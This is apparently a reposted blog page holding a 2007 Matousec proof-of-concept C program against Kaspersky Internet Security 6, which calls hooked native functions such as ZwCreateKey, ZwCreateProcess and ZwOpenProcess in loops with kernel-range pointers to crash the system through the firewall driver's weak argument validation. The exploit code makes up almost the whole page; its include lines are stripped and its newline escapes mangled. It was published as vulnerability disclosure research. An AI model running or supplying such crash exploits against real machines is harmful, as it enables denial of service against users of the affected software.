Vuln: Kaspersky Internet Security 6 SSDT Hooks Multiple Local Vulnerabilities

原创 2007年09月28日 17:00:00
/*

Testing program for Multiple insufficient argument validation of hooked SSDT function (BTP00000P006KA)


Usage:
prog FUNCNAME
FUNCNAME - name of function to be checked

Description:
This program calls given function with parameters that crash the system. This happens because of
insufficient validation of function arguments in the driver of the firewall.

Test:
Running the testing program with the name of a function from the list of affected functions.

*/

#undef __STRICT_ANSI__
#include
#include
#include
#include
#include

typedef NTSTATUS NTAPI (*ZW_CREATE_PROCESS_EX)(OUT PHANDLE ProcessHandle,IN ACCESS_MASK DesiredAccess,IN POBJECT_ATTRIBUTES ObjectAttributes,IN HANDLE InheritFromProcessHandle,IN BOOLEAN InheritHandles,IN HANDLE SectionHandle OPTIONAL,IN HANDLE DebugPort OPTIONAL,IN HANDLE ExceptionPort OPTIONAL,IN ULONG Unknown);


void about(void)
{
printf("Testing program for Multiple insufficient argument validation of hooked SSDT function (BTP00000P006KA)/n");
printf("Windows Personal Firewall analysis project/n");
printf("Copyright 2007 by Matousec - Transparent security/n");
printf("http://www.matousec.com/""/n/n");
return;
}

void usage(void)
{
printf("Usage: test FUNCNAME/n"
" FUNCNAME - name of function to be checked/n");
return;
}

int main(int argc,char **argv)
{
about();

if (argc!=2)
{
usage();
return 1;
}

if (!stricmp(argv[1],"NtCreateKey") || !stricmp(argv[1],"ZwCreateKey"))
{
HANDLE handle;

for (int i=0;i>=0;i++)
ZwCreateKey(&handle,KEY_ALL_ACCESS,(PVOID)(0x80000000+i),0,NULL,0,NULL);

} else if (!stricmp(argv[1],"NtCreateProcess") || !stricmp(argv[1],"ZwCreateProcess"))
{
OBJECT_ATTRIBUTES oa;
for (int i=0;i>=0;i++)
ZwCreateProcess((PHANDLE)(i+0x80000000),PROCESS_ALL_ACCESS,&oa,NULL,FALSE,NULL,NULL,NULL);
} else if (!stricmp(argv[1],"NtCreateProcessEx") || !stricmp(argv[1],"ZwCreateProcessEx"))
{
ZW_CREATE_PROCESS_EX ZwCreateProcessEx=(ZW_CREATE_PROCESS_EX)GetProcAddress(GetModuleHandle("ntdll.dll"),"ZwCreateProcessEx");
if (ZwCreateProcessEx)
{
OBJECT_ATTRIBUTES oa;
for (int i=0;i>=0;i++)
ZwCreateProcessEx((PHANDLE)(i+0x80000000),PROCESS_ALL_ACCESS,&oa,NULL,FALSE,NULL,NULL,NULL,0);
}
} else if (!stricmp(argv[1],"NtCreateSection") || !stricmp(argv[1],"ZwCreateSection"))
{
HANDLE handle;
for (int i=0;i>=0;i++)
{
POBJECT_ATTRIBUTES oa=(PVOID)(i+0x80000000);
ZwCreateSection(&handle,0,oa,NULL,0,0,NULL);
}
} else if (!stricmp(argv[1],"NtCreateSymbolicLinkObject") || !stricmp(argv[1],"ZwCreateSymbolicLinkObject"))
{
HANDLE handle;
OBJECT_ATTRIBUTES oa;
for (int i=0;i>=0;i++)
{
UNICODE_STRING us={0x1000,0x1000,(PWSTR)(i+0x80000000)};
InitializeObjectAttributes(&oa,&us,0,NULL,NULL);
ZwCreateSymbolicLinkObject(&handle,SYMBOLIC_LINK_ALL_ACCESS,&oa,&us);
}
} else if (!stricmp(argv[1],"NtCreateThread") || !stricmp(argv[1],"ZwCreateThread"))
{
HANDLE handle;
CLIENT_ID clid;
OBJECT_ATTRIBUTES oa;
USER_STACK us;
for (int i=0;i>=0;i++)
ZwCreateThread(&handle,THREAD_ALL_ACCESS,&oa,(HANDLE)i,&clid,(PCONTEXT)(i+0x80000000),&us,FALSE);
} else if (!stricmp(argv[1],"NtLoadKey2") || !stricmp(argv[1],"ZwLoadKey2"))
{
OBJECT_ATTRIBUTES oa2;

for (int i=0;i>=0;i++)
{
POBJECT_ATTRIBUTES oa=(PVOID)(i+0x80000000);
ZwLoadKey2(oa,&oa2,REG_NO_LAZY_FLUSH);
}
} else if (!stricmp(argv[1],"NtOpenKey") || !stricmp(argv[1],"ZwOpenKey"))
{
HANDLE handle;
for (int i=0;i>=0;i++)
{
POBJECT_ATTRIBUTES oa=(PVOID)(i+0x80000000);
ZwOpenKey(&handle,KEY_ALL_ACCESS,oa);
}
} else if (!stricmp(argv[1],"NtOpenProcess") || !stricmp(argv[1],"ZwOpenProcess"))
{
HANDLE handle;
OBJECT_ATTRIBUTES oa;
UNICODE_STRING us={0x1000,0x1000,NULL};
InitializeObjectAttributes(&oa,&us,0,NULL,NULL);
for (int i=0;i>=0;i++)
{
PCLIENT_ID clid=(PVOID)(i+0x80000000);
ZwOpenProcess(&handle,PROCESS_ALL_ACCESS,&oa,clid);
}
} else printf("/nI do not know how to exploit the vulnerability using this function./n");

printf("/nTEST FAILED!/n");
return 1;
}
 

相关文章推荐

Kaspersky Internet Security 2010

  • 2010年10月21日 11:13
  • 333KB
  • 下载

phpcms v9 Multiple Vulnerabilities

hpcmsV9最新版SQL注射+XSS 详细说明: XSS  public function public_get_suggest_keyword() { $ur...
  • god_7z1
  • god_7z1
  • 2012年07月18日 14:56
  • 551

Kaspersky Internet Security 2010

  • 2011年03月15日 08:18
  • 2KB
  • 下载

Multiple Vulnerabilities in Scrutinizer NetFlow & sFlow Analyzer

Trustwave SpiderLabs Security Advisory TWSL2012-014: Multiple Vulnerabilities in Scrutinizer NetFlo...

Software Security Vulnerabilities

  • 2013年03月25日 22:25
  • 187KB
  • 下载

iOS安全编码指南 Secure Coding Guide -- 02 Types of Security Vulnerabilities 上

IOS安全编码指南 Secure Coding Guide -- 02 Types of Security Vulnerabilities 上 Most software security vu...

Kaspersky-Security-Center设置

  • 2017年05月25日 15:56
  • 1.06MB
  • 下载

Norton Internet Security 序列号提取(卡饭)

准备材料: 1. Norton Internet Security 2014 (版本:21.1.0.18)     下载:http://buy-download.norton.com/downlo...
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:Vuln: Kaspersky Internet Security 6 SSDT Hooks Multiple Local Vulnerabilities
举报原因:
原因补充:

(最多只允许输入30个字)